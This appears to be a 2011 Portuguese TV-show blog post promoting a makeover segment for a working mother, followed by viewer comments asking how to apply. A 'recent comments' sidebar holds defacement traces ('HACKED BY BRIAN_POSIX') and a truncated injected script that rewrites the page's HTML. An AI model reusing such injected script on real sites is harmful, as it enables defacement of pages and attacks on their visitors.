Esta quinta-feira voltamos a receber uma transformação incrível.

 

Cátia Rodrigues pediu ajuda ao Mais Mulher num momento muito difícil da sua vida. Num dia-a-dia que a obriga a conciliar dois empregos, todas as energias que sobravam eram para o filho, de 5 anos, a motivação e o tempo para cuidar dela própria praticamente não existiam.

 

Como consequência a sua auto-estima foi-se tornando cada vez menor. Tudo isto agora é passado, depois da ajuda dos nossos especialistas da transformação, Teresa Branco, Christopher Johnsson, Lúcia Piloto e ainda as consultoras de Moda,"Let's Shop".

 

Descubra como e porquê no Look Mais Mulher desta quinta-feira.

Já sabe, só aqui encontra tudo aquilo que procura, e muito Mais.

 

 

 

 



Andreia Pereira @ 19:26

Qui, 02/06/11

 

Olá Ana Rita, estou neste momento a ver o teu programa e fiquei muito inspirada.
Revejo-me na Cátia , pela história de vida e pelo que aconteceu ao corpo dela com a falta de hábitos , por isso e gostaria de saber se ainda há a possibilidade de me candidatar a algo do genero.
Parabéns pelo programa e um beijinho
Andreia

Catia Medeiros @ 19:42

Qui, 02/06/11

 

Olá Ana Rita. Gostei muito de ver a transformação da Cátia. Eu Chamo-me Cátia Medeiros, tenho 21 anos, sou de Ponta Delgada, ilha de São Miguel/Açores e infelizmente encontro-me também na mesma situação do que ela. No espaço de um ano engordei 10 kilos, neste momento peso 70 kilos e estou super infeliz comigo, sinto-me mesmo muito mal, não gosto de olhar-me ao espelho e hoje em dia nem gosto de me arranjar. Estudo e trabalho ao mesmo tempo para também poder pagar as minhas proprinas e deste modo acabo por nao ter muito tempo para cuidar de mim. Será que podiam ajudar-me de alguma forma a gostar mais de mim?

com os melhores cumprimentos

Cátia Medeiros

kikiai @ 19:59

Qui, 02/06/11

 

Ana Rita, adorei a trança que tens hoje :) estas girissima!


vania-vicente @ 20:00

Qui, 02/06/11

 

olá boa tarde...
chamo-me vania vicente tenho 32 anos.
tenho 3 filhos fui mae muito jovem e gostava muito que me ajuda-sem a realizar um sonho que a muito esta perdido devido a eu ter 3 filhos e estar desempregada.
fui mãe pela 1ª vez aos 18 anos e o meu corpo ficou totalmente desfigurado tenho vergonha de me despir em frente do meu companheiro e de toda a gente por isso pesso a Ana Rita que me ajude a realizar meu sonho de voltar a sorrir e ser mulher obg e agradeço que me de resposta muito obrigado e felicidades

Madalena Cansado @ 20:13

Qui, 02/06/11

 

Olá. Acabei de ver o vosso programa, e algo me disse q isto poderia ser a hipótese q ter aquilo q tanto anseio, e só tenho visto em programas estrangeiros. Não sei se ainda existem candidaturas mas perguntar não custa. Sou uma rapariga de 22 anos e tenho alguns complexos, não me sinto bem como estou e sou, creio que isso me influencia bastante na relação que tenho com as outras pessoas. Sou bastante tímida e sisuda. Se tivesse um corpo melhor, alguém que m indicasse um caminho para ficar mais confiante eu aceitaria sem dúvida, pois seria uma reviravolta e estou certa que ia sorrir muitas mais vezes.

marisa carreira crespo @ 11:45

Sex, 03/06/11

 

Como Podemos concorrer.... há muito que penso em pedir ajuda, mas tenho tido vergonha mas cada vez mais me sinto abatida e deprimida. Gostava que me dissessem se ainda nos podemos inscrever.
bjs


Tecnologia de Bolso @ 16:22

Qua, 15/06/11

 

Boa tarde,

Para concorrer ao "Look Mais Mulher", tem de enviar em e-mail para maismulher@sic.pt,
com a sua história e fotografias.

Obrigado

Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
blogs SAPO